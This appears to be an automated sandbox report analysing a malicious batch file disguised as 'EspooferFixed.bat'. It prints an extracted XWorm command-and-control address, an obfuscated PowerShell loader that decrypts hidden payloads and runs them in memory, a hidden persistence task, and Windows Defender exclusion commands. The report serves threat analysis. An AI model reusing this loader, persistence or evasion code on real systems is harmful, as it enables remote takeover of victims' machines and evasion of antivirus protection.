Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20250113-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20250113-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
24-01-2025 15:00
Static task
static1
General
-
Target
EspooferFixed.bat
-
Size
265KB
-
MD5
b305aa4a553e75efdef58b62ab9a1363
-
SHA1
14b80df7c7cd154275564d8678a99e99096bcbe4
-
SHA256
3af55470fb8f6549631c51af8fb360e144b3a2213328251fb5c893afefd39b2a
-
SHA512
ba37b738e73e85d8b4d5ec186c2469d533b94692f00ad07931287fed3bf3c7c9b17ed52f6e9289eb846ebfad25009d6ff1486880d91c45b63be96f276b45ba8f
-
SSDEEP
6144:qo5yDFBOGJBGmR9BJTGPbL5aFPB9Wxo8W2823a8kyXQ5iDoaPz73HyXMft6E:HgFt7hR9BJSPP5yBUxosXQ5koab73Hy2
Malware Config
Extracted
xworm
IDKTOBEHONESTNIGAS-56344.portmap.io:56344
GgTsuAV3pXf6aU6z
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral1/memory/2212-49-0x000002407A7A0000-0x000002407A7B0000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 64 IoCs
flow pid Process 16 2212 powershell.exe 21 2212 powershell.exe 22 2212 powershell.exe 27 2212 powershell.exe 28 2212 powershell.exe 31 2212 powershell.exe 32 2212 powershell.exe 34 2212 powershell.exe 35 2212 powershell.exe 36 2212 powershell.exe 37 2212 powershell.exe 38 2212 powershell.exe 39 2212 powershell.exe 40 2212 powershell.exe 41 2212 powershell.exe 53 2212 powershell.exe 54 2212 powershell.exe 59 2212 powershell.exe 60 2212 powershell.exe 61 2212 powershell.exe 62 2212 powershell.exe 63 2212 powershell.exe 64 2212 powershell.exe 65 2212 powershell.exe 66 2212 powershell.exe 67 2212 powershell.exe 68 2212 powershell.exe 69 2212 powershell.exe 70 2212 powershell.exe 71 2212 powershell.exe 72 2212 powershell.exe 73 2212 powershell.exe 74 2212 powershell.exe 75 2212 powershell.exe 76 2212 powershell.exe 77 2212 powershell.exe 78 2212 powershell.exe 79 2212 powershell.exe 80 2212 powershell.exe 81 2212 powershell.exe 82 2212 powershell.exe 83 2212 powershell.exe 84 2212 powershell.exe 85 2212 powershell.exe 90 2212 powershell.exe 91 2212 powershell.exe 92 2212 powershell.exe 93 2212 powershell.exe 94 2212 powershell.exe 95 2212 powershell.exe 96 2212 powershell.exe 97 2212 powershell.exe 98 2212 powershell.exe 99 2212 powershell.exe 100 2212 powershell.exe 101 2212 powershell.exe 102 2212 powershell.exe 103 2212 powershell.exe 104 2212 powershell.exe 105 2212 powershell.exe 106 2212 powershell.exe 107 2212 powershell.exe 108 2212 powershell.exe 109 2212 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2364 powershell.exe 2516 powershell.exe 4060 powershell.exe 2116 powershell.exe 2212 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000\Control Panel\International\Geo\Nation WScript.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 15 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2826969134-2088669430-2680400721-1000_Classes\Local Settings powershell.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 4060 powershell.exe 4060 powershell.exe 2116 powershell.exe 2116 powershell.exe 2212 powershell.exe 2212 powershell.exe 2364 powershell.exe 2364 powershell.exe 2516 powershell.exe 2516 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4060 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeIncreaseQuotaPrivilege 2116 powershell.exe Token: SeSecurityPrivilege 2116 powershell.exe Token: SeTakeOwnershipPrivilege 2116 powershell.exe Token: SeLoadDriverPrivilege 2116 powershell.exe Token: SeSystemProfilePrivilege 2116 powershell.exe Token: SeSystemtimePrivilege 2116 powershell.exe Token: SeProfSingleProcessPrivilege 2116 powershell.exe Token: SeIncBasePriorityPrivilege 2116 powershell.exe Token: SeCreatePagefilePrivilege 2116 powershell.exe Token: SeBackupPrivilege 2116 powershell.exe Token: SeRestorePrivilege 2116 powershell.exe Token: SeShutdownPrivilege 2116 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeSystemEnvironmentPrivilege 2116 powershell.exe Token: SeRemoteShutdownPrivilege 2116 powershell.exe Token: SeUndockPrivilege 2116 powershell.exe Token: SeManageVolumePrivilege 2116 powershell.exe Token: 33 2116 powershell.exe Token: 34 2116 powershell.exe Token: 35 2116 powershell.exe Token: 36 2116 powershell.exe Token: SeIncreaseQuotaPrivilege 2116 powershell.exe Token: SeSecurityPrivilege 2116 powershell.exe Token: SeTakeOwnershipPrivilege 2116 powershell.exe Token: SeLoadDriverPrivilege 2116 powershell.exe Token: SeSystemProfilePrivilege 2116 powershell.exe Token: SeSystemtimePrivilege 2116 powershell.exe Token: SeProfSingleProcessPrivilege 2116 powershell.exe Token: SeIncBasePriorityPrivilege 2116 powershell.exe Token: SeCreatePagefilePrivilege 2116 powershell.exe Token: SeBackupPrivilege 2116 powershell.exe Token: SeRestorePrivilege 2116 powershell.exe Token: SeShutdownPrivilege 2116 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeSystemEnvironmentPrivilege 2116 powershell.exe Token: SeRemoteShutdownPrivilege 2116 powershell.exe Token: SeUndockPrivilege 2116 powershell.exe Token: SeManageVolumePrivilege 2116 powershell.exe Token: 33 2116 powershell.exe Token: 34 2116 powershell.exe Token: 35 2116 powershell.exe Token: 36 2116 powershell.exe Token: SeIncreaseQuotaPrivilege 2116 powershell.exe Token: SeSecurityPrivilege 2116 powershell.exe Token: SeTakeOwnershipPrivilege 2116 powershell.exe Token: SeLoadDriverPrivilege 2116 powershell.exe Token: SeSystemProfilePrivilege 2116 powershell.exe Token: SeSystemtimePrivilege 2116 powershell.exe Token: SeProfSingleProcessPrivilege 2116 powershell.exe Token: SeIncBasePriorityPrivilege 2116 powershell.exe Token: SeCreatePagefilePrivilege 2116 powershell.exe Token: SeBackupPrivilege 2116 powershell.exe Token: SeRestorePrivilege 2116 powershell.exe Token: SeShutdownPrivilege 2116 powershell.exe Token: SeDebugPrivilege 2116 powershell.exe Token: SeSystemEnvironmentPrivilege 2116 powershell.exe Token: SeRemoteShutdownPrivilege 2116 powershell.exe Token: SeUndockPrivilege 2116 powershell.exe Token: SeManageVolumePrivilege 2116 powershell.exe Token: 33 2116 powershell.exe Token: 34 2116 powershell.exe Token: 35 2116 powershell.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 2372 wrote to memory of 4756 2372 cmd.exe 84 PID 2372 wrote to memory of 4756 2372 cmd.exe 84 PID 4756 wrote to memory of 2312 4756 net.exe 85 PID 4756 wrote to memory of 2312 4756 net.exe 85 PID 2372 wrote to memory of 4060 2372 cmd.exe 87 PID 2372 wrote to memory of 4060 2372 cmd.exe 87 PID 4060 wrote to memory of 2116 4060 powershell.exe 88 PID 4060 wrote to memory of 2116 4060 powershell.exe 88 PID 4060 wrote to memory of 3420 4060 powershell.exe 93 PID 4060 wrote to memory of 3420 4060 powershell.exe 93 PID 3420 wrote to memory of 1512 3420 WScript.exe 94 PID 3420 wrote to memory of 1512 3420 WScript.exe 94 PID 1512 wrote to memory of 3724 1512 cmd.exe 96 PID 1512 wrote to memory of 3724 1512 cmd.exe 96 PID 3724 wrote to memory of 4948 3724 net.exe 97 PID 3724 wrote to memory of 4948 3724 net.exe 97 PID 1512 wrote to memory of 2212 1512 cmd.exe 99 PID 1512 wrote to memory of 2212 1512 cmd.exe 99 PID 2212 wrote to memory of 2364 2212 powershell.exe 101 PID 2212 wrote to memory of 2364 2212 powershell.exe 101 PID 2212 wrote to memory of 2516 2212 powershell.exe 104 PID 2212 wrote to memory of 2516 2212 powershell.exe 104
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\EspooferFixed.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\system32\net.exenet file2⤵
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file3⤵PID:2312
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeKLtf1YCHmqQ7MCDNc9FlnD43khnJ48NqLcoY7YtN4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rvPEd9GdqynNNz5vbAi1Yg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYXsr=New-Object System.IO.MemoryStream(,$param_var); $VsGOH=New-Object System.IO.MemoryStream; $PHuFH=New-Object System.IO.Compression.GZipStream($tYXsr, [IO.Compression.CompressionMode]::Decompress); $PHuFH.CopyTo($VsGOH); $PHuFH.Dispose(); $tYXsr.Dispose(); $VsGOH.Dispose(); $VsGOH.ToArray();}function execute_function($param_var,$param2_var){ $mniqI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fYbOB=$mniqI.EntryPoint; $fYbOB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\EspooferFixed.bat';$fRtaI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\EspooferFixed.bat').Split([Environment]::NewLine);foreach ($YdJlk in $fRtaI) { if ($YdJlk.StartsWith(':: ')) { $efvGy=$YdJlk.Substring(3); break; }}$payloads_var=[string[]]$efvGy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_79_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_79.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2116
-
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_79.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3420 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_79.bat" "4⤵
- Suspicious use of WriteProcessMemory
PID:1512 -
C:\Windows\system32\net.exenet file5⤵
- Suspicious use of WriteProcessMemory
PID:3724 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 file6⤵PID:4948
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yeKLtf1YCHmqQ7MCDNc9FlnD43khnJ48NqLcoY7YtN4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rvPEd9GdqynNNz5vbAi1Yg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $tYXsr=New-Object System.IO.MemoryStream(,$param_var); $VsGOH=New-Object System.IO.MemoryStream; $PHuFH=New-Object System.IO.Compression.GZipStream($tYXsr, [IO.Compression.CompressionMode]::Decompress); $PHuFH.CopyTo($VsGOH); $PHuFH.Dispose(); $tYXsr.Dispose(); $VsGOH.Dispose(); $VsGOH.ToArray();}function execute_function($param_var,$param2_var){ $mniqI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $fYbOB=$mniqI.EntryPoint; $fYbOB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_79.bat';$fRtaI=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_79.bat').Split([Environment]::NewLine);foreach ($YdJlk in $fRtaI) { if ($YdJlk.StartsWith(':: ')) { $efvGy=$YdJlk.Substring(3); break; }}$payloads_var=[string[]]$efvGy.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2364
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2516
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD53eb3833f769dd890afc295b977eab4b4
SHA1e857649b037939602c72ad003e5d3698695f436f
SHA256c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
SHA512c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72
-
Filesize
1KB
MD52e4e6cd714d0a6b24d21df4b15a8efef
SHA1ea175071d140c16f803d5b372a1282e0297d18dc
SHA25668b99a29dded5e875531cbaf532938c5b4663046cb45f0b079e36a1f6ec45644
SHA51244b84a22db9d5c7b6e180643bab446ea7a3705f38321b96ddf6a2de663969984423656aab8c58d55428144c74f5a6c84227ac41d2559ab7fa6e35b8e03d1b25a
-
Filesize
1KB
MD56a807b1c91ac66f33f88a787d64904c1
SHA183c554c7de04a8115c9005709e5cd01fca82c5d3
SHA256155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256
SHA51229f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
114B
MD5ea7689b92bd40415e099221965437358
SHA17a16f0037daf94e1013249cc175f00745707c19c
SHA25679b869ea9a520ef5ba9bb46ca7a7095bafdc8403108ad258582a14ca2fcbed93
SHA512872b1086b540bd9684d6942cb508bfc8f26ee16028925dd1623f95b74bb861c5c96e8a5f158f7ca38e74bd74013350928e30ffb28f829a424c99b8db17c13885